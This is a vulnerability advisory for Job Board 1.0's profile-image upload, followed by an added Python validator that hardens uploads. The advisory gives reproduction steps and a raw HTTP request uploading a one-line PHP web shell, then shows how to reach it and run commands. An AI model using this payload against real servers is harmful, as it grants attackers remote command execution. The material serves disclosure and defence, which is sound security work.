| Title | Job Board 1.0 - Arbitrary File Upload Leads to RCE |
|---|
| Description | Author : skalvin aka (CraCkEr)
Date : 25/06/2023
Website : https://demo.smartwebinfotech.site/job-board/
Vendor : Smartweb Infotech
Software : Job Board 1.0 - Job Portal Management System
Vuln Type : Arbitrary File Upload Leads to RCE
Impact : Upload a PHP shell and execute commands on the server
Release Notes:
Allows an attacker to overwrite critical files simply by uploading a shell and to execute
commands on the server
## Steps to Reproduce:
1. Go to [My Profile] at this path (https://website/settings/account)
2. Upload any image and capture the request in Burp Suite
3. Replace image.png with upload.php in [filename] and add this simple PHP shell:
```http
POST /job-board/settings/account HTTP/2

-----------------------------427088175318086545183087924022
Content-Disposition: form-data; name="profile"; filename="shell.php"
Content-Type: image/png

<?php echo system($_GET['command']); ?>
-----------------------------427088175318086545183087924022--
```
4. Send the request
5. Go back to the path (https://website/settings/account)
6. Refresh the page
7. Copy the link of the (unloaded) image
8. Open the link to your uploaded PHP shell - path (https://website/storage/upload/profile/shell_1687559183.php?command=id)
9. RCE executed!
[-] Done |
|---|
| User | skalvin (UID 49463) |
|---|
| Submission | 25.06.2023 13:11 (3 years ago) |
|---|
| Moderation | 04.07.2023 15:33 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 232952 [SmartWeb Infotech Job Board 1.0 My Profile Page /settings/account filename privilege escalation] |
|---|
| Points | 17 |
|---|
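The stored name in step 8 (`shell_1687559183.php`, the client's filename with a timestamp appended) shows what went wrong: the handler kept the client-supplied extension and accepted the client-declared `Content-Type: image/png` at face value. The following is an added example, not code from the advisory or from Smartweb Infotech, of the validation a profile-image endpoint should apply instead: the stored extension is decided from the file's magic bytes, a PNG must end exactly at its IEND chunk (so a real image with PHP appended is refused), and the stored name is random and server-chosen. The function names, the 1x1 PNG and the three test uploads are constructed here; only the one-line shell string is taken from the advisory's request body.

```python
"""Hardened profile-image upload validation (added example, not the vendor's code).
Decides from file content, never from the client's filename or Content-Type,
whether an upload is stored and under what name."""
import secrets
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


class UploadRejected(ValueError):
    """Raised for anything that is not a well-formed image of an allowed type."""


def sniff_image_type(data: bytes) -> str:
    """Return the extension the server will assign, decided by magic bytes only."""
    if data.startswith(PNG_SIG):
        return "png"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpg"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    raise UploadRejected("magic bytes do not match an allowed image type")


def check_png_structure(data: bytes) -> None:
    """Walk the PNG chunk list and require the file to end exactly at IEND.

    A real PNG with a PHP payload appended after IEND passes the magic-byte
    check but fails here; every chunk CRC is verified on the way."""
    pos = len(PNG_SIG)
    first = True
    while True:
        if pos + 8 > len(data):
            raise UploadRejected("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start, end = pos + 8, pos + 8 + length
        if end + 4 > len(data):
            raise UploadRejected("truncated chunk data")
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + data[start:end]) != crc:
            raise UploadRejected("chunk CRC mismatch")
        if first and ctype != b"IHDR":
            raise UploadRejected("first chunk is not IHDR")
        first = False
        pos = end + 4
        if ctype == b"IEND":
            break
    if pos != len(data):
        raise UploadRejected("trailing bytes after IEND")


def accept_profile_image(client_filename: str, declared_type: str,
                         data: bytes, max_bytes: int = 2 * 1024 * 1024) -> str:
    """Validate an upload and return the storage name the server assigns.

    client_filename and declared_type are taken only so the caller can log them;
    neither influences the decision or the stored extension. The vulnerable
    handler did the opposite: it kept "shell.php" and appended a timestamp."""
    if len(data) > max_bytes:
        raise UploadRejected("file too large")
    ext = sniff_image_type(data)
    if ext == "png":
        check_png_structure(data)
    # Random, server-chosen name; nothing the client sent survives into it.
    return f"{secrets.token_hex(16)}.{ext}"


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))


def make_png() -> bytes:
    """Constructed 1x1 RGB PNG used as sample input (not a file from the page)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte + one red pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# The one-line shell from the advisory's request body.
PHP_SHELL = b"<?php echo system($_GET['command']); ?>"


def demo() -> dict:
    """Run the advisory's upload and two constructed variants through the validator."""
    cases = {
        "shell.php, PHP body, declared image/png": ("shell.php", "image/png", PHP_SHELL),
        "shell.php, real PNG body": ("shell.php", "image/png", make_png()),
        "avatar.png, PNG with PHP appended after IEND": ("avatar.png", "image/png", make_png() + PHP_SHELL),
    }
    results = {}
    for label, (name, ctype, data) in cases.items():
        try:
            results[label] = "stored as " + accept_profile_image(name, ctype, data)
        except UploadRejected as exc:
            results[label] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:48} -> {outcome}")
```

The advisory's upload is refused on the first check because its body starts with `<?php`, not a PNG signature; a genuine PNG sent as `shell.php` is stored under a random `.png` name, so the client's extension never reaches the filesystem; a PNG/PHP polyglot is refused for trailing bytes. JPEG and GIF are accepted on magic bytes alone here, so for them the server-assigned extension is the load-bearing control. Independently of this check, the upload directory (`/storage/upload/profile/` on the affected site) should be served with script execution disabled or placed outside the web root, so a validation bypass still cannot turn a stored file into a shell.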